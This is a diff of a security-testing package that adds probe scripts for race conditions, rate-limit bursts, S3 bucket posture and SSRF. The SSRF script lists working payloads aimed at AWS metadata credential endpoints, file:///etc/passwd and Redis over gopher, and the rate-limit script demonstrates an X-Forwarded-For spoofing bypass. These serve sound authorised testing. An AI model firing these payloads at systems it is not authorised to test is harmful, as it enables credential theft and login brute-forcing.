websec-validator 0.2.0__py3-none-any.whl

websec_validator/templates/probes/race-conditions.py

@@ -0,0 +1,144 @@
+#!/usr/bin/env python3
+"""
+Race condition probe — fires N parallel requests at race-prone endpoints
+and checks if the server's invariants hold.
+
+Common race targets:
+  - "claim" / "assign" endpoints — only one parallel claim should succeed
+  - status / state toggles — multiple parallel calls should converge
+  - inventory / quota decrements — should not allow over-spend
+  - tag/label-add endpoints — should dedupe
+
+For each target:
+  - Fire PARALLEL_REQUESTS in parallel
+  - Count successes (200/201)
+  - Compare to expected_unique (usually 1 — only one assignment should win)
+  - If success_count > expected_unique -> race condition likely
+
+Uses async httpx for true parallelism (synchronous loops can't trigger races).
+
+Install: pip install httpx
+"""
+import asyncio, httpx, json, sys
+from pathlib import Path
+from collections import Counter
+
+ROOT = Path(__file__).resolve().parents[2].parent
+fixture = json.loads((ROOT / 'security/pentest-prep/fixtures/test-context.json').read_text())
+ENV = {}
+for line in (ROOT / 'security/zap/.env').read_text().splitlines():
+    if '=' in line and not line.lstrip().startswith('#'):
+        k, v = line.split('=', 1); ENV[k.strip()] = v.strip()
+
+TARGET = fixture['target']
+A_GROUP = fixture['agent_a']['group_id']
+A_CONV = fixture['agent_a']['conversation_ids'][0]
+A_USER_ID = fixture['agent_a'].get('user_id', '<AGENT_A_USER_ID>')
+
+import subprocess
+def login(u, p):
+    r = subprocess.run(['curl','-fsS','-X','POST',f"{TARGET}/api/auth/login",
+                        '-H','Content-Type: application/json',
+                        '-d',json.dumps({'email':u,'password':p})],
+                       capture_output=True, text=True)
+    return json.loads(r.stdout)['tokens']['accessToken']
+
+AGENT_TOK = login(ENV['ZAP_AGENT_USER'], ENV['ZAP_AGENT_PASS'])
+
+PARALLEL = 50  # number of concurrent requests per target
+
+# PROJECT-SPECIFIC START
+# TODO: replace these with the race-prone endpoints from your project.
+# Common shapes:
+#   - assign / claim: one winner expected
+#   - state toggle (snooze, archive, status flip): converges to one state
+#   - tag/label add: deduplicates
+#   - inventory decrement, points spend, quota use: must not over-spend
+TARGETS = [
+    {
+        'name': 'assign-resource',
+        'method': 'POST',
+        'url': f"{TARGET}/api/groups/{A_GROUP}/conversations/{A_CONV}/assign",
+        'payload': {'agentId': A_USER_ID},
+        'expected_unique': 1,
+        'note': '50 parallel assigns to self -- should only one succeed (or all idempotent 200s if backend dedupes)',
+    },
+    {
+        'name': 'snooze-resource',
+        'method': 'POST',
+        'url': f"{TARGET}/api/groups/{A_GROUP}/conversations/{A_CONV}/snooze",
+        'payload': {'snoozeUntil': '2027-01-01T00:00:00Z'},
+        'expected_unique': 1,
+        'note': 'Toggle endpoint -- multiple parallel calls should converge to one state',
+    },
+    {
+        'name': 'status-toggle',
+        'method': 'PUT',
+        'url': f"{TARGET}/api/users/me/status",
+        'payload': {'status': 'online'},
+        'expected_unique': 1,
+        'note': 'User status update -- parallel calls should converge',
+    },
+    {
+        'name': 'tag-add',
+        'method': 'POST',
+        'url': f"{TARGET}/api/groups/{A_GROUP}/conversations/{A_CONV}/tags",
+        'payload': {'tagId': 'race-test-tag-xxxxxxxx'},
+        'expected_unique': 1,
+        'note': '50 parallel adds of same tag -- should only add once if dedupe works',
+    },
+]
+# PROJECT-SPECIFIC END
+
+async def fire(client, t):
+    """Single request, return (status_code, response_body_preview)"""
+    try:
+        r = await client.request(
+            t['method'], t['url'],
+            json=t['payload'],
+            headers={'Authorization': f'Bearer {AGENT_TOK}'},
+            timeout=30.0,
+        )
+        return (r.status_code, r.text[:120])
+    except Exception as e:
+        return (None, str(e)[:120])
+
+async def run_target(t):
+    print(f"  Firing {PARALLEL} parallel {t['method']} to {t['url'][len(TARGET):]}")
+    async with httpx.AsyncClient() as client:
+        results = await asyncio.gather(*[fire(client, t) for _ in range(PARALLEL)])
+    codes = Counter(r[0] for r in results)
+    success = sum(1 for r in results if r[0] and 200 <= r[0] < 300)
+    race_likely = success > t['expected_unique']
+    print(f"  -> status counts: {dict(codes)}, successes: {success}, expected: {t['expected_unique']}")
+    if race_likely:
+        print(f"    !! RACE CONDITION SUSPECTED -- {success} successes vs {t['expected_unique']} expected")
+    return {
+        'name': t['name'],
+        'parallel': PARALLEL,
+        'status_counts': dict(codes),
+        'success_count': success,
+        'expected_unique': t['expected_unique'],
+        'race_suspected': race_likely,
+        'note': t['note'],
+        'sample_responses': [r for r in results if r[0] and r[0] < 500][:3],
+    }
+
+async def main():
+    findings = []
+    for t in TARGETS:
+        print(f"\n=== {t['name']}: {t['note']}")
+        f = await run_target(t)
+        findings.append(f)
+    out = ROOT / 'security/pentest-prep/reports/race-conditions/findings.json'
+    out.parent.mkdir(parents=True, exist_ok=True)
+    out.write_text(json.dumps(findings, indent=2))
+    crit = sum(1 for f in findings if f['race_suspected'])
+    print(f"\n=== Summary ===")
+    print(f"  race suspected on {crit}/{len(findings)} endpoints")
+    print(f"  saved to {out}")
+    return crit
+
+if __name__ == '__main__':
+    rc = asyncio.run(main())
+    sys.exit(1 if rc > 0 else 0)

websec_validator/templates/probes/rate-limit-burst.sh

@@ -0,0 +1,136 @@
+#!/usr/bin/env bash
+#
+# rate-limit-burst.sh — verify rate limiters actually fire under load.
+#
+# Three tests:
+#   1. AUTH_RATE_LIMIT — N failed login attempts; expect a 429 by attempt K
+#      (the project's documented per-IP login throttle).
+#   2. General apiRateLimiter — burst of GET requests against a public health
+#      endpoint; expect 429s once over the per-IP budget.
+#   3. X-Forwarded-For bypass — repeat (1) but rotate the XFF header between
+#      requests. If the backend honors XFF for rate-limit keying WITHOUT
+#      verifying the proxy chain, attackers bypass the limiter.
+#
+# Usage:  ./rate-limit-burst.sh
+set -euo pipefail
+cd "$(dirname "$0")"
+
+[[ -f .env ]] || { echo "No .env found" >&2; exit 1; }
+
+read_env() {
+    local key="$1"
+    python3 -c "
+for l in open('.env'):
+    l = l.rstrip('\n')
+    if l.startswith('#') or '=' not in l: continue
+    k, v = l.split('=', 1)
+    if k.strip() == '$key':
+        print(v); break
+"
+}
+
+TARGET="$(read_env ZAP_TARGET)"
+[[ -n "$TARGET" ]] || { echo "ZAP_TARGET missing from .env" >&2; exit 2; }
+
+# TODO: adjust login path and public health path to match your API.
+LOGIN_PATH="/api/auth/login"
+HEALTH_PATH="/api/health"
+
+PASS_COUNT=0
+FAIL_COUNT=0
+FAIL_LINES=()
+
+# === Test 1: AUTH_RATE_LIMIT ===
+echo "=== Test 1: AUTH_RATE_LIMIT (expected ≥1 of 10 attempts to be 429) ==="
+codes_seen=()
+for i in $(seq 1 10); do
+    code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET$LOGIN_PATH" \
+        -H 'Content-Type: application/json' \
+        -d '{"email":"rl-test@example.com","password":"wrong"}')
+    codes_seen+=("$code")
+    printf '  attempt %2d → %s\n' "$i" "$code"
+done
+if printf '%s\n' "${codes_seen[@]}" | grep -q '^429$'; then
+    echo "  PASS  AUTH_RATE_LIMIT fires (saw 429)"
+    PASS_COUNT=$((PASS_COUNT+1))
+else
+    echo "  FAIL  AUTH_RATE_LIMIT never fired — limiter may be misconfigured"
+    FAIL_COUNT=$((FAIL_COUNT+1))
+    FAIL_LINES+=("AUTH_RATE_LIMIT did not fire in 10 attempts")
+fi
+echo
+
+# === Test 2: General health burst ===
+echo "=== Test 2: 200 GET ${HEALTH_PATH} requests in ~10s ==="
+codes_file=$(mktemp)
+trap 'rm -f "$codes_file"' EXIT
+seq 1 200 | xargs -n 1 -P 20 -I{} curl -s -o /dev/null -w '%{http_code}\n' "$TARGET$HEALTH_PATH" > "$codes_file"
+
+total=$(wc -l < "$codes_file" | tr -d ' ')
+two_oh_oh=$(grep -c '^200$' "$codes_file" || true)
+four_two_nine=$(grep -c '^429$' "$codes_file" || true)
+other=$((total - two_oh_oh - four_two_nine))
+echo "  Total responses: $total"
+echo "  200: $two_oh_oh"
+echo "  429: $four_two_nine"
+echo "  Other: $other"
+if [[ "$four_two_nine" -gt 0 ]]; then
+    echo "  INFO  apiRateLimiter fires under burst (saw 429s)"
+else
+    echo "  INFO  apiRateLimiter did NOT fire — 200 reqs is below threshold."
+    echo "        (general limit is per-IP; for a pentest, escalate to ~5000 reqs)"
+fi
+echo
+
+# === Test 3: X-Forwarded-For bypass attempt ===
+echo "=== Test 3: try XFF spoof to bypass AUTH_RATE_LIMIT ==="
+echo "    (If the backend respects 'trust proxy = 1' correctly, spoofed XFF"
+echo "     headers from us — a direct client — should be IGNORED for rate-limit"
+echo "     keying.)"
+
+# First, get rate-limited so subsequent requests are blocked
+for i in $(seq 1 7); do
+    curl -s -o /dev/null -X POST "$TARGET$LOGIN_PATH" \
+        -H 'Content-Type: application/json' \
+        -d '{"email":"xff-test@example.com","password":"wrong"}' >/dev/null
+done
+
+code_baseline=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET$LOGIN_PATH" \
+    -H 'Content-Type: application/json' \
+    -d '{"email":"xff-test@example.com","password":"wrong"}')
+echo "  baseline (no XFF):       $code_baseline"
+
+spoofed_pass_count=0
+for xff in "1.2.3.4" "10.0.0.1" "192.168.1.99" "127.0.0.1" "1.1.1.1, 2.2.2.2"; do
+    code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET$LOGIN_PATH" \
+        -H 'Content-Type: application/json' \
+        -H "X-Forwarded-For: $xff" \
+        -d '{"email":"xff-test@example.com","password":"wrong"}')
+    printf '  XFF=%-25s → %s\n' "$xff" "$code"
+    if [[ "$code_baseline" == "429" && "$code" != "429" ]]; then
+        spoofed_pass_count=$((spoofed_pass_count + 1))
+    fi
+done
+
+if [[ "$code_baseline" != "429" ]]; then
+    echo "  SKIP  AUTH limiter not in 429 state for baseline — can't test bypass"
+elif [[ $spoofed_pass_count -gt 0 ]]; then
+    echo "  FAIL  XFF spoof bypassed AUTH_RATE_LIMIT ($spoofed_pass_count probes)"
+    FAIL_COUNT=$((FAIL_COUNT+1))
+    FAIL_LINES+=("XFF spoof bypasses AUTH_RATE_LIMIT — limiter may be keyed on req.ip without trust proxy validation")
+else
+    echo "  PASS  XFF spoof did NOT bypass the limiter (all stayed 429)"
+    PASS_COUNT=$((PASS_COUNT+1))
+fi
+echo
+
+echo "=== Summary ==="
+echo "  PASS: $PASS_COUNT"
+echo "  FAIL: $FAIL_COUNT"
+if [[ $FAIL_COUNT -gt 0 ]]; then
+    echo
+    echo "FAILED:"
+    printf '  - %s\n' "${FAIL_LINES[@]}"
+    exit 1
+fi
+echo "Rate limiters behave as expected."

websec_validator/templates/probes/s3-assess.sh

@@ -0,0 +1,120 @@
+#!/usr/bin/env bash
+# S3 bucket posture assessment.
+# ZAP can't meaningfully test an S3 bucket, so this checks it directly with the AWS CLI:
+# public-access posture, ACL/policy exposure, CORS, encryption, and anonymous reachability.
+#
+#   ./s3-assess.sh                          # uses defaults below
+#   ./s3-assess.sh my-bucket us-east-2
+#   BUCKET=x REGION=y ./s3-assess.sh
+#
+# Uses your configured AWS credentials. Read-only — never writes, deletes, or changes
+# anything. Anonymous probes use --no-sign-request / unauthenticated curl.
+set -uo pipefail
+
+BUCKET="${1:-${BUCKET:-<UPLOADS_BUCKET>}}"
+REGION="${2:-${REGION:-us-east-1}}"
+
+pass=0; warn=0; fail=0
+ok()   { echo "  [ OK ]  $*"; pass=$((pass+1)); }
+note() { echo "  [INFO]  $*"; }
+wn()   { echo "  [WARN]  $*"; warn=$((warn+1)); }
+bad()  { echo "  [FAIL]  $*"; fail=$((fail+1)); }
+hdr()  { echo; echo "== $* =="; }
+
+command -v aws >/dev/null || { echo "aws CLI not found. Install it or run from a box that has it."; exit 1; }
+echo "Assessing s3://$BUCKET (region $REGION) as: $(aws sts get-caller-identity --query Arn --output text 2>/dev/null || echo 'UNKNOWN')"
+
+hdr "Bucket exists / reachable"
+if aws s3api head-bucket --bucket "$BUCKET" --region "$REGION" 2>/tmp/_s3err; then
+  ok "head-bucket succeeded"
+else
+  bad "head-bucket failed: $(tr -d '\n' </tmp/_s3err). Check bucket name/region/credentials."
+  echo; echo "Cannot continue without bucket access."; exit 1
+fi
+
+hdr "Public Access Block (want all four = true)"
+PAB=$(aws s3api get-public-access-block --bucket "$BUCKET" --region "$REGION" \
+  --query 'PublicAccessBlockConfiguration' --output text 2>/dev/null)
+if [[ -z "$PAB" ]]; then
+  bad "No Public Access Block configured — bucket can be made public via ACL/policy."
+else
+  echo "  BlockPublicAcls/IgnorePublicAcls/BlockPublicPolicy/RestrictPublicBuckets = $PAB"
+  if [[ "$PAB" == "True	True	True	True" || "$PAB" == "true	true	true	true" ]]; then
+    ok "All public access blocked at the bucket level."
+  else
+    wn "One or more public-access-block settings are OFF — review above."
+  fi
+fi
+
+hdr "Bucket policy status (IsPublic should be False)"
+PS=$(aws s3api get-bucket-policy-status --bucket "$BUCKET" --region "$REGION" \
+  --query 'PolicyStatus.IsPublic' --output text 2>/dev/null)
+case "$PS" in
+  False|false) ok "Policy status: not public." ;;
+  True|true)   bad "Bucket policy is PUBLIC. Inspect the policy below." ;;
+  *)           note "No bucket policy (or none readable) — policy status N/A." ;;
+esac
+
+hdr "Bucket policy document"
+if aws s3api get-bucket-policy --bucket "$BUCKET" --region "$REGION" --query Policy --output text 2>/dev/null > /tmp/_s3pol && [[ -s /tmp/_s3pol ]]; then
+  python3 -m json.tool < /tmp/_s3pol 2>/dev/null | sed 's/^/    /' || sed 's/^/    /' /tmp/_s3pol
+  if grep -qE '"Principal"[[:space:]]*:[[:space:]]*"\*"|"AWS"[[:space:]]*:[[:space:]]*"\*"' /tmp/_s3pol; then
+    wn 'Policy contains a wildcard Principal ("*") — confirm it is paired with a tight Condition, not an open Allow.'
+  else
+    ok "No wildcard Principal in policy."
+  fi
+else
+  note "No bucket policy set."
+fi
+
+hdr "Bucket ACL (look for AllUsers / AuthenticatedUsers grants)"
+ACL=$(aws s3api get-bucket-acl --bucket "$BUCKET" --region "$REGION" \
+  --query "Grants[?contains(Grantee.URI || 'x','AllUsers') || contains(Grantee.URI || 'x','AuthenticatedUsers')].[Grantee.URI,Permission]" \
+  --output text 2>/dev/null)
+if [[ -z "$ACL" ]]; then
+  ok "No AllUsers/AuthenticatedUsers ACL grants."
+else
+  bad "Public/cross-account ACL grants found: $ACL"
+fi
+
+hdr "Default encryption (want AES256 or aws:kms)"
+ENC=$(aws s3api get-bucket-encryption --bucket "$BUCKET" --region "$REGION" \
+  --query 'ServerSideEncryptionConfiguration.Rules[0].ApplyServerSideEncryptionByDefault.SSEAlgorithm' \
+  --output text 2>/dev/null)
+[[ -n "$ENC" && "$ENC" != "None" ]] && ok "Default encryption: $ENC" || wn "No default encryption configured."
+
+hdr "CORS configuration (watch for AllowedOrigins '*')"
+CORS=$(aws s3api get-bucket-cors --bucket "$BUCKET" --region "$REGION" --output json 2>/dev/null)
+if [[ -z "$CORS" ]]; then
+  ok "No CORS configuration (or none readable)."
+else
+  echo "$CORS" | sed 's/^/    /'
+  echo "$CORS" | grep -q '"\*"' && wn "CORS allows '*' somewhere — confirm that's intended for an uploads bucket." || ok "No wildcard in CORS."
+fi
+
+hdr "Versioning"
+VER=$(aws s3api get-bucket-versioning --bucket "$BUCKET" --region "$REGION" --query Status --output text 2>/dev/null)
+[[ "$VER" == "Enabled" ]] && ok "Versioning enabled." || note "Versioning: ${VER:-not enabled}."
+
+hdr "Anonymous access probes (should all be DENIED)"
+if aws s3 ls "s3://$BUCKET" --no-sign-request --region "$REGION" >/dev/null 2>&1; then
+  bad "Anonymous ListBucket SUCCEEDED — bucket lists objects without credentials!"
+else
+  ok "Anonymous ListBucket denied."
+fi
+CODE=$(curl -s -o /dev/null -w '%{http_code}' "https://${BUCKET}.s3.${REGION}.amazonaws.com/" 2>/dev/null)
+case "$CODE" in
+  403) ok "Anonymous HTTP GET on bucket root → 403 (denied)." ;;
+  200) bad "Anonymous HTTP GET on bucket root → 200 (bucket index is PUBLIC)!" ;;
+  *)   note "Anonymous HTTP GET on bucket root → HTTP $CODE." ;;
+esac
+
+echo; echo "=================================================="
+echo "Summary for s3://$BUCKET : ${pass} OK, ${warn} WARN, ${fail} FAIL"
+echo "=================================================="
+echo "Reminder — also test the UPLOAD PATH (these are app-layer, not bucket-layer):"
+echo "  - content-type bypass on the upload endpoint (mime sniffing vs claimed type)"
+echo "  - path traversal in uploaded filenames (../ in the key)"
+echo "  - whether media signed-URL / media-token can be forged or replayed"
+rm -f /tmp/_s3err /tmp/_s3pol
+[[ $fail -gt 0 ]] && exit 1 || exit 0

websec_validator/templates/probes/ssrf-probes.sh

@@ -0,0 +1,189 @@
+#!/usr/bin/env bash
+#
+# ssrf-probes.sh — manual SSRF probe.
+#
+# Admin endpoints often accept URL-shaped fields (SSO domain, integration base
+# URLs, etc.). If a handler fetches those URLs server-side without validating
+# the host, an attacker who controls an admin account (or finds an admin auth
+# bypass) can force the backend to fetch AWS IMDS credentials, internal
+# services, or arbitrary intranet hosts.
+#
+# This probe attempts each known URL-accepting admin endpoint with classic
+# SSRF targets:
+#   - 169.254.169.254 — AWS EC2 IMDSv1 metadata endpoint
+#   - 169.254.170.2   — ECS task metadata
+#   - 127.0.0.1:3000  — localhost
+#   - 10.0.0.1        — RFC1918 internal
+#   - file://         — local file scheme (some HTTP libraries support this)
+#
+# Expected: each request returns 400/403 (input validation refuses the host),
+# or 200 with an error body that does NOT contain credential material / IMDS
+# response shapes. A response time > 5s on an IMDS URL (without immediate
+# rejection) is a strong signal the backend actually fetched it.
+#
+# Usage:
+#   1. Set ZAP_ADMIN_USER / ZAP_ADMIN_PASS in .env.
+#   2. ./ssrf-probes.sh
+set -euo pipefail
+cd "$(dirname "$0")"
+
+[[ -f .env ]] || { echo "No .env found" >&2; exit 1; }
+
+read_env() {
+    local key="$1"
+    python3 -c "
+for l in open('.env'):
+    l = l.rstrip('\n')
+    if l.startswith('#') or '=' not in l: continue
+    k, v = l.split('=', 1)
+    if k.strip() == '$key':
+        print(v); break
+"
+}
+
+TARGET="$(read_env ZAP_TARGET)"
+USER="$(read_env ZAP_ADMIN_USER)"
+PASS="$(read_env ZAP_ADMIN_PASS)"
+
+[[ -n "$TARGET" && -n "$USER" && -n "$PASS" ]] || {
+    echo "ERROR: ZAP_TARGET / ZAP_ADMIN_USER / ZAP_ADMIN_PASS required in .env" >&2
+    echo "SSRF probes need an admin account (system/integration permissions)" >&2
+    exit 2
+}
+
+echo "==> minting admin token..."
+TOKEN=$(curl -fsS -X POST "$TARGET/api/auth/login" \
+    -H 'Content-Type: application/json' \
+    -d "$(jq -nc --arg e "$USER" --arg p "$PASS" '{email:$e,password:$p}')" \
+  | jq -r '.tokens.accessToken')
+[[ -n "$TOKEN" && "$TOKEN" != "null" ]] || { echo "admin login failed" >&2; exit 3; }
+
+SSRF_TARGETS=(
+    "http://169.254.169.254/latest/meta-data/"
+    "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+    "http://169.254.170.2/v2/credentials/"
+    "http://127.0.0.1:3000/api/admin/users"
+    "http://10.0.0.1/"
+    "http://[::1]:3000/"
+    "file:///etc/passwd"
+    "gopher://127.0.0.1:6379/_INFO"
+)
+
+FAIL_COUNT=0
+WARN_COUNT=0
+FAIL_LINES=()
+
+PROBE_PUT() {
+    local label="$1" endpoint="$2" body_template="$3"
+    for url in "${SSRF_TARGETS[@]}"; do
+        local body
+        body=$(echo "$body_template" | sed "s|{SSRF}|$url|g")
+        local start end duration code body_resp
+        start=$(date +%s)
+        body_resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X PUT "$TARGET$endpoint" \
+            -H "Authorization: Bearer $TOKEN" \
+            -H 'Content-Type: application/json' \
+            -d "$body" 2>&1 || true)
+        end=$(date +%s)
+        duration=$((end - start))
+        code=$(echo "$body_resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
+        body_clean=$(echo "$body_resp" | grep -v 'HTTP_CODE:' | head -c 200)
+        evaluate_response "$label" "PUT $endpoint url=$url" "$code" "$duration" "$body_clean"
+    done
+}
+
+PROBE_POST() {
+    local label="$1" endpoint="$2" body_template="$3"
+    for url in "${SSRF_TARGETS[@]}"; do
+        local body
+        body=$(echo "$body_template" | sed "s|{SSRF}|$url|g")
+        local start end duration code body_resp
+        start=$(date +%s)
+        body_resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X POST "$TARGET$endpoint" \
+            -H "Authorization: Bearer $TOKEN" \
+            -H 'Content-Type: application/json' \
+            -d "$body" 2>&1 || true)
+        end=$(date +%s)
+        duration=$((end - start))
+        code=$(echo "$body_resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
+        body_clean=$(echo "$body_resp" | grep -v 'HTTP_CODE:' | head -c 200)
+        evaluate_response "$label" "POST $endpoint url=$url" "$code" "$duration" "$body_clean"
+    done
+}
+
+evaluate_response() {
+    local label="$1" probe="$2" code="$3" duration="$4" body="$5"
+    if echo "$body" | grep -qE 'AccessKeyId|SecretAccessKey|InstanceId|root:x:0:0|redis_version'; then
+        printf '  %-4s %s [code=%s, %ds]  EVIDENCE OF SSRF in body!\n' FAIL "$probe" "$code" "$duration"
+        FAIL_COUNT=$((FAIL_COUNT+1))
+        FAIL_LINES+=("$label $probe — IMDS/file/redis content leaked")
+        return
+    fi
+    if [[ "$probe" == *"169.254.169.254"* || "$probe" == *"169.254.170.2"* ]]; then
+        if [[ "$duration" -gt 5 ]]; then
+            printf '  %-4s %s [code=%s, %ds]  slow response — backend may have fetched IMDS\n' WARN "$probe" "$code" "$duration"
+            WARN_COUNT=$((WARN_COUNT+1))
+            return
+        fi
+    fi
+    if [[ "$code" == "400" || "$code" == "403" || "$code" == "422" ]]; then
+        printf '  %-4s %s [code=%s, %ds]  validation rejected\n' PASS "$probe" "$code" "$duration"
+        return
+    fi
+    if [[ "$code" == "500" ]]; then
+        printf '  %-4s %s [code=%s, %ds]  backend errored — verify it did not attempt the fetch\n' WARN "$probe" "$code" "$duration"
+        WARN_COUNT=$((WARN_COUNT+1))
+        return
+    fi
+    if [[ "$code" == "200" ]]; then
+        printf '  %-4s %s [code=%s, %ds]  200 OK no IMDS evidence (handled gracefully)\n' PASS "$probe" "$code" "$duration"
+        return
+    fi
+    printf '  %-4s %s [code=%s, %ds]\n' PASS "$probe" "$code" "$duration"
+}
+
+# PROJECT-SPECIFIC START
+# These probes target the URL-accepting admin endpoints in your application.
+# REPLACE them with your project's endpoints. Look for any admin handler that
+# takes a URL/host/endpoint/domain field in its request body. Common shapes:
+#   - SSO settings (issuer URL, metadata URL, callback)
+#   - Integration config (webhook target, S3 endpoint, GraphQL URL)
+#   - "Test connection" endpoints
+
+echo "=== SSO settings — typically accepts SSO domain / issuer URLs ==="
+PROBE_PUT "sso-settings" "/api/auth/sso/settings" \
+    '{"enabled":true,"issuer":"{SSRF}","clientId":"x","clientSecret":"y","metadataUrl":"{SSRF}"}'
+
+echo
+echo "=== SSO test endpoint ==="
+PROBE_POST "sso-test" "/api/auth/sso/test" '{"domain":"{SSRF}"}'
+
+echo
+echo "=== Integration settings — third-party base URL etc. ==="
+PROBE_PUT "integrations" "/api/admin/integrations" \
+    '{"providerBaseUrl":"{SSRF}","providerApiKey":"x"}'
+
+echo
+echo "=== Integration test endpoints ==="
+PROBE_POST "test-s3" "/api/admin/integrations/test/s3" \
+    '{"awsS3Endpoint":"{SSRF}","awsS3Bucket":"test","awsS3Region":"us-east-1","awsS3AccessKeyId":"AKIA","awsS3SecretAccessKey":"x"}'
+PROBE_POST "test-graphql" "/api/admin/integrations/test/graphql" \
+    '{"graphqlUrl":"{SSRF}","apiKey":"x"}'
+# PROJECT-SPECIFIC END
+
+echo
+echo "=== Summary ==="
+echo "  FAIL (definitive SSRF evidence): $FAIL_COUNT"
+echo "  WARN (suspicious — manual review): $WARN_COUNT"
+if [[ $FAIL_COUNT -gt 0 ]]; then
+    echo
+    echo "REAL SSRF FINDINGS:"
+    printf '  - %s\n' "${FAIL_LINES[@]}"
+    exit 1
+fi
+if [[ $WARN_COUNT -gt 0 ]]; then
+    echo
+    echo "Review the WARN lines manually — they may indicate the backend"
+    echo "is fetching the URL even though no credential content leaked back."
+fi
+echo "No SSRF evidence found."